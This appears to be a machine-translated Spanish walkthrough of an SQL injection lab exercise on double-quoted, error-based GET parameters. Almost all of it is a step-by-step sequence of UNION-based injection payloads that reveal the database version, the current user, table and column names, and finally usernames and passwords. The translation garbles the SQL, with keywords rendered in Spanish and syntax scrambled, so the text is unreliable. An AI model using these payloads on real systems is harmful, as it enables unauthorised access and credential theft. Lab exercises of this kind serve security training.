Menos-4 - GET de error basados Cotizaciones -Doble - Cadena
1.原页面
2.?id=1 
3.?id=1'
4. 
' '' 1 \' ') LÍMITE 0,1' -> '' 1 \ '') lÍMITE 0,1
SQL:
Seleccionar login_name, contraseña de administrador donde id = ( “id”) límite de 0,1
. = 1 5.id ") - + 
6.?id=1") por 3- Solicitar + 
7. La consulta de base de datos la información de versión
ID = 0 ") 1 SELECT Unión, Versión (), 3- +?. 
8. Las consultas de bases de datos y nombre de usuario
? lo anterior mencionado de id = 0 ") de la Unión SELECT 1, Base de Datos (), el usuario () - + 
9. búsqueda de nombre mesa
? id = 0") union select 1, (seleccione GROUP_CONCAT (nombre_tabla) de INFORMATION_SCHEMA.TABLES donde esquema_tabla = ' seguridad '), usuario () - +
10. El nombre de la consulta la columna
id = 0 ") union select 1 ?, (seleccione GROUP_CONCAT (nombre_columna) desde donde INFORMATION_SCHEMA.COLUMNS esquema_tabla =' seguridad 'y nombre_tabla =' usuarios), 3- 
11. Se pregunta el nombre de usuario y contraseña
? id = 0 ") union select 1, GROUP_CONCAT (nombre de usuario, 0x3a, password), 3 de usuarios- +
